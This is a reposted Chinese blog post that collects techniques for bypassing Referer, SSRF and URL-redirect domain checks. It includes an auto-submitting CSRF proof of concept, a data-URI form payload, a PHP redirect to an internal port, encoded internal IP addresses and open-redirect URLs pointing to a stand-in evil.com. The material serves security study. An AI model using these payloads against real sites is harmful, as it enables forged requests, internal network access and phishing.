关于绕过域名(ip)校验的一些小知识

最新推荐文章于 2022-08-27 10:09:14 发布
最新推荐文章于 2022-08-27 10:09:14 发布
阅读量1.6k 收藏 5
点赞数
文章标签: php java ldap
原文链接:http://www.cnblogs.com/jinqi520/p/10067883.html
版权

这篇文章最开始只是想写一个关于绕过referer的方法,写着写着发现和ssrf以及url跳转的一些手法类似,于是把这两种也加上了

 

对referer做校验一般是对csrf进行防范的手段之一,但是很多时候不经意间还会增加其他攻击的难度,如xss,jsonp劫持等等。

这里对referer的绕过做一个小的总结:
目标网站是:www.domain.com

攻击者的域名是:evil.com

 

1.使用子域名的方式绕过,如下:

http://domain.evil.com/

 

2.注册一个类似的域名,如下:
http://www.evildomain.com/

 

3.将域名以参数的形式接下url后面(#也可以)

http://www.evil.com/?http://www.domain.com

 

4.利用空referer

  1)利用ftp://,http://,https://,file://,javascript:,data:等伪协议进行跳转,如下

  <html>
        <body>
       <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
        </body>
      </html>

 

  2)添加<meta name="referrer" content="never">,poc如下

  <html>   

  <meta name="referrer" content="never">   

  <body>   

    <script>history.pushState('', '', '/')</script>     

    <form action="http://127.0.0.1/test.php">       

    <input type="submit" value="Submit request" />     

  </form>     

  <script>       document.forms[0].submit();     </script>   

  </body>

  </html>

  

  3)https跳到http时也没有referer

5.如果受信任的网站中可以添加链接,可以在受信任的网站上添加链接,但是不支持post的csrf

 

6.利用url跳转

 

7.结合受信任的网站的xss漏洞进行利用

 

 

顺便把ssrf绕过的几种方法在这里补充下:

1.[::]   (直接在浏览器中输出是不行的,貌似和服务器端代码实现有关)          http://0/ 攻击本地  

2.利用@    http://example.com@192.168.1.1

3.特殊域名    http://192.168.1.1.xip.io/

4.DNS重绑定  利用ceye平台

5.利用Enclosed alphanumerics

6.   127。0。0。1

7.利用进制   八进制钱加0  十六进制钱加0x        需要补位1-》01 然后再进制转换

  1.可以是十六进制,八进制等。 115.239.210.26  >>>  16373751032 首先把这四段数字给分别转成16进制,结果:73 ef d2 1a 然后把 73efd21a 这十六进制一起转换成8进制 记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样),十六进制加0x

  2.http://127.0.0.1  -》  http://0177.0.0.1/

 

8.利用协议   dict://     sftp://   ldap://   goapher://

-----------------------------------------------------2019.3.11---------------------------------------------------------------

今天在FB上看到一种绕过ssrf控制的方法(原文在https://www.freebuf.com/vuls/196619.html)

当服务器端仅是对内网ip做正则时(这些场景是我意淫的),可以控制url让服务器请求我们自己的网站下的某个网页,在网页下进行重定向(这也是为什么ssrf的方法措施中有一个项是禁止30X跳转)

<?php header("location: http://[::]:22/"); ?>


另外:今天也搞清楚了一件事,单单只是页面上的重定向属于浏览器前端跳转,重定向漏洞不能ssrf(以前这个地方一直有点迷..........)

 

 

 

 

 

URL跳转绕过:
1.利用问号?

http://www.aaa.com/acb?Url=http://evil.com?login.aaa.com

2.利用井号#

http://www.aaa.com/acb?Url=http://evil.com#login.aaa.com

3.利用@

http://www.aaa.com/acb?Url=http://aaa.com@www.evil.com

3.利用正反斜杠

http://www.aaa.com/acb?Url=http://evil.com/login.aaa.com

http://www.aaa.com/acb?Url=http://evil.com\\login.aaa.com  

http://www.aaa.com/acb?Url=http://evil.com\login.aaa.com

http://www.aaa.com/acb?Url=http://evil.com\.login.aaa.com  

4.百名单缺陷(白名单是aaa.com)

www.evilaaa.com       www.aaa.com.evil.com

 

5.多重跳转(没试过,感觉应该不行吧)

 

 

http://www.aaa.com/acb?Url=http://login.aaa.com/acb?url=http://login.test.com

6.利用http://www.aaa.com.220.181.57.217.xip.io   实际上访问的是IP地址

 

------------------------------------------------------------2019.5.17------------------------

再补充一个:Java中经常会通过java.net.URL.gethost()来获取url的域名,但是方法获取域名时在以往的jdk版本中是存在问题的

比如说 url 是  “https://www.rebeyond.net\@www.huawei.com/poc.htm”  通过该方法获取的host将是www.rebeyond.net\@www.huawei.com   而浏览器访问时是www.rebeyond.net

https://www.rebeyond.net\.www.huawei.com/poc.htm    将@改为 . 也可以

 

转载于:https://www.cnblogs.com/jinqi520/p/10067883.html

weixin_30955341
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-22978 Spring-security 认证绕过漏洞分析和漏洞挖掘思考
Q54665642ljf的博客
09-08 6290
在此之前,已经对CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过漏洞进行了分析,它和CVE-2022-22978漏洞产生原理上,本质是一样的。在分析这两个漏洞后,结合今年kcon议题《自动化API漏洞Fuzz实战》,产生了对漏洞挖掘关注点的一些思考。
[信息收集]11种绕过CDN查找真实IP方法【转载】
baguangman5501的博客
08-07 3057
今天在看一些有关CDN的文章的时候,发现一篇写的蛮好的文章,故转载过来。 原文链接:https://www.cnblogs.com/qiudabai/p/9763739.html 0x01 验证是否存在CDN 1.1 方法1: 很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有: http://ping.china...
java中用正则表达式检测IP地址是否合理
04-19
平时我们会经常遇到对IP地址的检测,检验IP地址是否合理。当然你可以通过其他程序代码去实现,这里用正则表达式去实现更为简单。
SSRF漏洞的多种绕过方式与防御手段
告白的博客
03-14 8198
SSRF即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。
解决微信公众号授权域名限制的问题
Javamine的博客
03-26 5187
在微信公众号中,业务域名、JS安全域名及网页授权域名是有限制数量的,如下 而往往业务中是需要多个的,此时可以如下方法解决: 使用中间页面作为跳板,根据微信跳转到中间页面,加载获取约定的标识参数,根据标识再跳转到指定的服务页面。此时公众号设置中只是配置一个中间域名。 ...
忽略wx公众号网页授权域名验证
mekings13的博客
06-12 2677
如何忽略wx公众号网页授权域名、JS接口安全域名备案验证
微信小程序 合法域名校验出错详解及解决办法
12-12
微信小程序 合法域名校验出错详解及解决办法 看下出现错误: 微信小程序开发,遇到这个问题怎么办? 产生原因是因为发起了wx.request请求 而请求的域名没有在微信公众平台后台设置。 1.开发者自己手动设置不...
单向校验证书绕过 justTrustMePlush-release.zip
04-12
在IT安全领域,尤其是移动应用的安全分析中,"单向校验证书绕过"是一个重要的概念,这通常涉及到Android应用程序的签名验证。标题中的“justTrustMePlush-release.zip”可能是一个工具包,用于帮助开发者或安全研究...
Codeigniter校验ip地址的方法
01-21
本文实例讲述了Codeigniter校验ip地址的方法。分享给大家供大家参考。具体分析如下: 这里演示了Codeigniter如何获取用户ip地址,同时校验ip地址的有效性 获取用户ip: $this->input->ip_address(); //如果ip获取...
微信小程序实现表单校验功能
08-29
"微信小程序实现表单校验功能" 微信小程序实现表单校验功能是小程序开发中最难实现的公共业务之一。表单校验的难点在于表单组件的多样性和校验规则的多样性,导致复杂度达到n³。解决这个问题的关键是组件化和非...
微信公众号H5开发 没有正式域名,没有公众号 没有公众号没怎么调试接口
weixin_43933027的博客
04-26 1232
项目场景:微信公众号H5开发 没有正式域名,没有公众号 微信公众号H5开发 没有正式域名,没有公众号没怎么调试接口 一般开发都会在微信公众号后台绑定开发者 但是有时候特殊情况暂时无法绑定 解决方案:WX提供了一个专门用来测试的地方,不需要绑定正式域名 https://mp.weixin.qq.com/debug/cgi-bin/sandbox?t=sandbox/login 先扫码登录进去 3号标绑定域名 4号自己扫码关注 3.然后往下翻 找到 体验接口权限表 》 网页服务 》网页帐号 > 网
微信公众号之验证JS-SDK
youhebuke225的博客
08-27 458
我们一般在自定义返回的页面上,点击,可以使用微信的js-sdk,但是需要我们进行引入假设我们在search路由引入js-sdk,在引入js-sdk的时候,我们首先要生成js-sdk的使用的签名,签名的规则我们可以查看官网点击。...
使用浏览器访问或调试微信公众号(跳过微信认证)
weixin_30565327的博客
08-16 1631
因为大部分公众号web应用实际登录都是使用用户微信认证登录,下文主要是提供一种方法使在PC端使用任意浏览器绕过微信认证完成登录,后面就可以在浏览器中使用或调试web应用。 应用服务器(我们自己的第三方应用程序)需要知道是谁在访问服务(登录),而在微信公众号应用中登录一般都是使用静默的oauth2,由微信认证用户的真实性,并通知应用服务器当前用户是哪位(openid...
9种常见的前端跨域解决方案(详解)
热门推荐
zh0623的博客
03-25 2万+
文章转载自:9种常见的前端跨域解决方案(详解)_慕课手记 (imooc.com) 一、什么是跨域?   在前端领域中,跨域是指浏览器允许向服务器发送跨域请求,从而克服Ajax只能同源使用的限制。 什么是同源策略?   同源策略是一种约定,由Netscape公司1995年引入浏览器,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,浏览器很容易受到XSS、CSFR等攻击。所谓同源是指"协议+域名+端口"三者相同,即便两个不同的域名指向同一个ip地址,也非同源。   同源策略限
JAVA验证IP地址的有效性
九阳土豆的专栏
08-15 7926
为了防止用户输入无效的IP地址,可以在输入IP地址时,对其进行验证,如果是有效的IP地址,则可以进行网络操作,否则可以提示IP地址无效,这样就可以防止输入错误的IP地址。 例7.13  创建一个CheckIp类,在类中编写验证IP地址的方法。(光盘位置:光盘\MR\Instance\7\13\CheckIpAddressApp) public class CheckIp {      publ
Java检测网址、ip地址或者服务器是否可用
蔡小波的博客
01-08 5804
import java.io.IOException; import java.net.HttpURLConnection; import java.net.InetAddress; import java.net.MalformedURLException; import java.net.URL; import javax.net.ssl.HostnameVerifier; import ...
验证IP地址(Java)
looshen的博客
11-21 422
编写一个函数来验证输入的字符串是否是有效的 IPv4 或 IPv6 地址。 如果是有效的 IPv4 地址,返回 "IPv4" ; 如果是有效的 IPv6 地址,返回 "IPv6" ; 如果不是上述类型的 IP 地址,返回 "Neither" 。 IPv4 地址由十进制数和点来表示,每个地址包含 4 个十进制数,其范围为 0 -?255,用(".")分割。比如,172.16.254.1; 同时,IPv4 地址内的数不会以 0 开头。比如,地址?172.16.254.01 是不合法的。 IPv6 地址由 8 组
如何合理绕过域名开关类的安卓网络验证
Qiled的博客
06-04 896
如何合理绕过域名开关类的安卓网络验证 小胖个人博客:www.zhuoyue360.com 原文链接:http://www.zhuoyue360.com/index.php/archives/21/ 交流群:348355266 今天有一个需求,逆向某违法APK,分析其的工作原理.由于样本不便提供,这里只提供部分代码. private String mSerial = "123"; int id = view.getId(); if (id == R.id.adb_view) { Reque
ctf中如何绕过数字大小校验
最新发布
05-25
数字大小校验通常是指程序会对输入的数字做大小限制,例如输入的数字不能超过某一个范围或者必须大于等于某个值。如果要绕过这个校验,可以考虑以下几种方法: 1. 利用溢出:输入较大的数字可能会导致变量溢出,从而使得数字大小校验失效。例如,如果程序限制输入的数字不能超过100,那么输入一个很大的负数可能会导致溢出,使得程序认为输入的数字大于100。 2. 修改校验逻辑:在程序运行时找到数字大小校验的代码,将其修改为始终返回true的代码,从而绕过校验。这种方法需要对程序的逻辑和代码结构有一定的了解。 3. 模拟输入:在数字大小校验之前,程序可能会对输入做一些处理,例如取余、加减等操作。如果能够模拟这些操作,就可以绕过数字大小校验。例如,如果程序要求输入的数字必须是偶数,那么可以输入一个很大的奇数,然后在校验之前模拟一个取余操作,使得程序认为输入的数字是偶数。 需要注意的是,绕过数字大小校验可能会导致程序逻辑错误或者安全漏洞,因此应该谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值